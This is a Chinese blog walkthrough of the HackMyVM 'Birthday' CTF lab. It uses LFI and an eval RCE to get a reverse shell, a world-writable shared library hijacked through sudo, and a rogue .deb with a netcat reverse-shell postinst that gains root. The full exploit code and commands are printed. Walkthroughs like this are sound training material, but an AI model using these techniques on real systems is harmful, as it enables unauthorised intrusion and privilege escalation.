[HackMyVM]靶场Birthday

最新推荐文章于 2024-06-30 09:01:33 发布
最新推荐文章于 2024-06-30 09:01:33 发布
阅读量854 收藏 7
点赞数 33
分类专栏: hackmyvm 文章标签: 网络空间安全 内网渗透 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/137422838
版权

难度:Hard

kali:192.168.56.104

靶机:192.168.56.149

端口扫描

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 10:39 CST
Nmap scan report for 192.168.56.149
Host is up (0.00016s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E8:95:BE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

好消息端口不是很复杂 22 80两个端口

浅扫目录

┌──(root㉿kali2)-[~/Desktop]
└─#  gobuster dir -u http://192.168.56.149 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,html,txt,php,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.hta.zip             (Status: 403) [Size: 279]
/.hta.html            (Status: 403) [Size: 279]
/.hta.txt             (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.hta.bak             (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.bak        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess.zip        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.bak        (Status: 403) [Size: 279]
/.htpasswd.zip        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/index.php            (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/index.php            (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/server-status        (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================

很好,很干净。

去看web

源码没什么东西,只有一张图片,进行隐写分析后发现并没有什么隐写,唯一利用点只剩url了

乱试一通,发现把data改成birthday就跳转到了birthday_party_program.php

每个都点一下试试,发现有一个可能FLI

然后下面点击here的时候还会跳转到一个计算生日的url

猜测可以命令执行,就用LFI读一下文件源码

http://192.168.56.149/birthday_party_program.php?page=/var/www/html/birthday_calculator.php

<?php

            if (isset($_GET['dob'])) {
                $dob = addslashes($_GET['dob']);
                eval("\$dob = \"$dob\";");

                $now = new DateTime();
                $nextBirthday = new DateTime($dob);
                $nextBirthday->setDate($now->format('Y'), $nextBirthday->format('m'), $nextBirthday->format('d'));
                
                if($nextBirthday < $now) {
                    $nextBirthday->modify('+1 year');
                }

                $interval = $now->diff($nextBirthday);
                echo "<p>Your next birthday is in: ".$interval->days." days!</p>";
            }
        ?>

搜索到一篇关于addslashes绕过的文章

使用复杂变量绕过addslashes函数实现RCE_eval('$str="'.addslashes($str).'";' );-CSDN博客

反弹个shell

┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 50338
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@birthday:/var/www/html$

home下只有一个用户chloe但是无权进入,不过sudo -l可以提升权限

www-data@birthday:/var/www$ cd /home
cd /home
www-data@birthday:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root  root  4096 Jun 28  2023 .
drwxr-xr-x 18 root  root  4096 Jul 14  2023 ..
drwx------  4 chloe chloe 4096 Jul 14  2023 chloe
www-data@birthday:/home$ cd chloe
cd chloe
bash: cd: chloe: Permission denied
www-data@birthday:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on birthday:
    (chloe) NOPASSWD: /usr/bin/zodiac

www-data@birthday:/home$ zodiac
zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
Your Zodiac sign is: Capricorn

是一个计算星座点击脚本

看一下权限

www-data@birthday:/usr/bin$ ls -al ./zodiac
ls -al ./zodiac
-rwxr-xr-x 1 root root 16056 Jun 29  2023 ./zodiac

不能修改,那只能从动态链接库下手了

www-data@birthday:/usr/bin$ ldd ./zodiac
ldd ./zodiac
        linux-vdso.so.1 (0x00007ffed7d85000)
        libzodiac.so => /lib/x86_64-linux-gnu/libzodiac.so (0x00007f8d26467000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8d26286000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f8d26477000)

能下手的只有libzodiac.so,看一下权限

www-data@birthday:/usr/bin$ ls -al /lib/x86_64-linux-gnu/libzodiac.so
ls -al /lib/x86_64-linux-gnu/libzodiac.so
-rwxr-xrwx 1 root root 15096 Jul  6  2022 /lib/x86_64-linux-gnu/libzodiac.so

可以修改

www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
int main(){
        system("/bin/bash");
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on birthday:
    (chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
/usr/bin/zodiac: symbol lookup error: /usr/bin/zodiac: undefined symbol: get_zodiac_sign

写个简单的c发现报错

需要get_zodiac_sign这个函数,那就修改一下exp

www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
int get_zodiac_sign()
{
        system("/bin/bash");
}
int main(){
        get_zodiac_sign();
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on birthday:
    (chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
chloe@birthday:/tmp$ id
id
uid=1001(chloe) gid=1001(chloe) groups=1001(chloe)
chloe@birthday:/tmp$

成功拿到chloe的权限

提权root

在opt目录下发现一个脚本,并且所属root

chloe@birthday:/opt$ ls -al
ls -al
total 16
drwxr-xr-x+  3 root root 4096 Jul 14  2023 .
drwxr-xr-x  18 root root 4096 Jul 14  2023 ..
drwxr-xrwx   2 root root 4096 Jul  2  2023 packages
-rwxr-xr-x   1 root root  357 Jul  2  2023 script.sh
chloe@birthday:/opt$ cat script.sh
cat script.sh
#!/bin/bash

URL="http://ipv4.download.thinkbroadband.com/50MB.zip"

FILE="50MB.zip"

if [ -f "$FILE" ]; then
    rm "$FILE"
fi

START=$(date +%s.%N)
wget -O $FILE $URL
END=$(date +%s.%N)

DIFF=$(echo "$END - $START" | bc)

SIZE=$(du -b $FILE | cut -f1)
SPEED=$(echo "scale=2; ($SIZE*8/1000000)/$DIFF" | bc)

echo "Download speed : $SPEED Mbps"

rm "$FILE"

计算从指定url下载文件所用的时间

用pspy64分析一下

发现/usr/bin/ansible-playbook /etc/ansible/install.yml 会被定时执行

2024/04/06 05:41:09 CMD: UID=0    PID=25666  | /usr/bin/python3 /usr/bin/ansible-playbook /etc/ansible/install.yml 
chloe@birthday:~$ ls -al /etc/ansible/install.yml 
ls -al /etc/ansible/install.yml 
-rw-r--r-- 1 root root 1174 Jul 13  2023 /etc/ansible/install.yml
chloe@birthday:~$ cat /etc/ansible/install.yml 
cat /etc/ansible/install.yml 
- hosts: clients
  tasks:
  
    - name: Run script /opt/script.sh
      ansible.builtin.command: /opt/script.sh
      
    - name: Install debian packages
      ansible.builtin.apt:
        deb: "/opt/packages/{{ item }}"
      loop:
        - abigail-doc_2.2-2_all.deb
        - airspy_1.0.10-2+b1_amd64.deb
        - aobook_1.0.3-3_amd64.deb
        - auto-07p_0.9.2+dfsg-3+b3_amd64.deb
        - bacula-console_9.6.7-7_amd64.deb
      
    - name: Copy /var/www/html to /var/backup/site.zip
      ansible.builtin.archive:
        path: /var/www/html
        dest: /var/backup/site.zip
      
    - name: Check who is connected
      ansible.builtin.shell: who > /tmp/who.txt
        
    - name: Add entry in /etc/hosts
      ansible.builtin.lineinfile:
        path: /etc/hosts
        line: "127.0.0.1    localhost.me"
        
    - name: Install apt package
      ansible.builtin.apt:
        name: htop
        state: present
        
    - name: Install netdata
      ansible.builtin.apt:
        name: netdata
        state: present

    - name: Run netdata service
      ansible.builtin.systemd:
        name: netdata
        enabled: yes
        state: started

这是个YAML 格式的 Ansible Playbook 文件

1.执行/opt/script.sh这个脚本

2.安装/opt/packages/下面的debian包

3.将/var/www/html打包成/var/backup/site.zip

4.执行who的指令,将结果输出到/tmp/who.txt

5.在/etc/hosts中将127.0.0.1映射到localhost.me

6.安装htop,netdata,启用netdata服务

利用方式是创建一个可以反弹shell的debian包

这一块我不会直接看wp了

chloe@birthday:/dev/shm$ mkdir deb
chloe@birthday:/dev/shm$ cd deb
chloe@birthday:/dev/shm/deb$ mkdir -p package/DEBIAN
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/postinst
nc -e /bin/bash 192.168.56.104 4444
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/control
Package: revshell
Version: 1.0
Architecture: all
Description: revshell
Maintainer: crom
chloe@birthday:/dev/shm/deb$ chmod +x package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ dpkg-deb --build package
chloe@birthday:/dev/shm/deb$ mv package.deb /opt/packages/aobook_1.0.3-3_amd64.deb
replace '/opt/packages/aobook_1.0.3-3_amd64.deb', overriding mode 0644 (rw-r--r--)? y

kali开个监听就能拿到root

┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 51688
uid=0(root) gid=0(root) groups=0(root)
cat /root/r*

tao0845
关注
  • 33
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透靶场——HackMyVM:Ceres
tlovejr的博客
03-22 1434
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 扫描到存活靶机IP地址为192.168.1.137 扫描端口 nmap -A -p- 192.168.1.137 发现只有22端口和80web端口开放,接下来针对80web端口进行渗透即可。 Web渗透 http://192.168.1.137/
渗透靶场——HackMyVM:Sedem
tlovejr的博客
03-29 2613
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址 192.168.1.7 扫描端口 扫描靶机开放的服务端口 nmap -p- -A 192.168.1.7 发现也就是22和80端口正常开放,那接下来还是老套路,对80web端口开始渗透 Web渗透 http://192.168.
渗透靶场——HackMyVM:Pingme
tlovejr的博客
04-13 3267
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:桥接自动获取ip 靶机ip地址:(桥接自动获取ip) 提示信息: CTF 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机192.168.1.10 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.10 发现还是只有22端口和80端口开放 Web渗透 访问web端口 http:
靶场渗透之hackmyvm Paner
m0_58289533的博客
06-09 333
靶场来源:公众号:PTEHub,关注公众号:PTEHub 获取最新靶场资源靶场类型:单局域网收集信息我们先用nmap扫描一下端口发现22端口和80端口开放nmap -sS -p 1-65535 -v 访问web端口,发现是一个提交表单的页面,无论我们输入什么,都显示已经注册。我们用burp来抓个包,发现使用xml来传输数据。 可能存在xxe漏洞,我们修改一下请求包,尝试读取文件,发现有root和david用户可以登录 接下来我们只需要找到密码就可以尝试进行ssh连接 。尝试读取/...
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3137
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
关于HackMyMV靶场的靶机网络配置与下载
weixin_58368471的博客
06-10 856
BOX的适配问题
渗透靶场——HackMyVM:Area51
tlovejr的博客
04-07 4027
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 此次靶场是针对Log4j2漏洞复现的一个靶场,大家可以直接上手操作一遍 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 扫描到存活主机ip地址为192.168.1.97 扫描端口 nmap -A -p- -T4 192.168.1.97 发现端口有的还是80/8080/22这三个端口 Web渗透 老规矩,还是先
HackMyvm靶机系列(3)-visions
qq_70727026的博客
05-12 1078
一、信息收集 先探测网段,得到目标主机 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 然后进行端口扫描,发现ssh服务和http服务 nmap -sC -sV -p- 192.168.200.234 访问一下http服务,发现只有一张图片和一段注释。 这段注释看上去是一个提示,aliccia猜测可能是一个用户 使用dirsearch扫描一下目录,看看能有什么收获不 dirsearch -u http://19..
渗透靶场——HackMyVM:Family
tlovejr的博客
03-21 1026
部署环境: 提供镜像文件后,直接用虚拟机打开即可,在这里和以往有些不同,我采取了两个虚拟机软件的形式,一个是VMware,另个就是就是vbox,连接的方式都是桥接即可 Kali机ip地址:192.168.1.5 靶机ip地址:192.168.1.6 1、扫描存活主机ip地址 arp-scan -l 2、扫描一下存活端口 nmap -v -A -p- 192.168.1.6 发现只有22端口还有80这个web端口开放,直接对80端口进行访问 3、对web80端口开始进行渗透 首页里面有一个wordp
常见靶场汇总
3hex的博客
10-09 6277
部分靶场是线上,部分是需要搭建本地环境。 1. 综合性靶场 DVWA - Damn Vulnerable Web ApplicationDamn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a le.
开源靶场zsbdzsbd
04-19
开源靶场zsbdzsbd
uploadlabs靶场文件
02-27
搭建在phpstudy/www 目录下解压后把名字改成upload-labs,部署lamp后可直接从127.0.0.1中打开
详解 Vulhub 靶场搭建
06-12
手把手教你vulhub搭建命令和过程
vulhub靶场.zip
10-14
vulhub靶场
webgoat靶场需要自行搭建
01-19
webgoat靶场需要自行搭建
加密与安全_三种方式实现基于国密非对称加密算法的加解密和签名验签
最新发布
小工匠
06-30 1021
无需秘钥,“加密”后的数据不可逆。所以这也不算是“加密”,一般称为哈希(Hash)。任何长度的数据生成的哈希值长度都固定。相同数据每次生成的哈希值相同,不同的数据则不同。数据摘要/哈希,验证数据是否被篡改、或数据丢失,保障数据的完整性、不可篡改性。单向加密保存数据,如密码的保存,密码的存储普遍都是存的哈希值,登录时比较其hash值即可。
港口危险货物安全管理人员考试题库(含答案)
m0_66937659的博客
06-28 371
9.《消防法》第四十条规定:公众聚集的场所未经消防安全检查或者经检查不合格,擅自使用或者开业的,责令限期改正逾期不改正的,责令停止施工、停止使用或者停产停业( )。11.机关、团体、企业、事业等单位以及村民委员会,居民委员会根据需要,建立志愿消防队等多种形式的( ),开展群众性自防自救工作。B、安全生产管理制度和操作规程的完善有效性,事故应急预案的科学性、可操作性、有效性。D、安全生产管理制度和操作规程的完善有效性,事故应急预案的针对性、可操作性、有效性。4.液化石油气属于( )。
WEB攻防【5】——JS项目/Node.js框架安全/识别审计/验证绕过
weixin_42090431的博客
06-27 353
JS开发的WEB应用和PHP、java.NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。网站检查网络下面加载了哪些js文件、以及js文件里面有没有嵌套别的js文件。一般有/static/js/app.j8 等顺序的js文件。2、开发框架-Vulhub-Node.JS安全。3、真实应用-APP应用直接重置密码。4、真实应用-违法彩彩文件上传安全。1、原生JS&开发框架-安全条件。4、如何获取更多的Js文件?2、流行的Js框架有那些?3、如何判定Js开发应用?5、如何快速获取价值代码?
韩国锂电池工厂火灾:行业安全警钟再次敲响
iotsensor的博客
06-27 361
这些传感器可以实时监测锂电池的温度、压力、气体浓度等参数,一旦发现异常情况,可以立即发出警报并采取相应措施,从而有效避免火灾事故的发生。同时,也需要加大研发力度,推动锂电池安全技术的不断进步和创新,以确保锂电池的安全可靠使用。等传感器监测防护区内CO气体浓度、氢气浓度、VOC浓度、可燃气体浓度和电池表面温度的变化,智能判断锂电池是否发生热失控,提前预警,有效避免火灾事故的发生。随着新能源汽车和储能领域的快速发展,锂电池的应用规模不断扩大,但与此同时,其潜在的安全风险也在不断提升。、氢气(H2)传感器。
vulfocus靶场
07-28
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值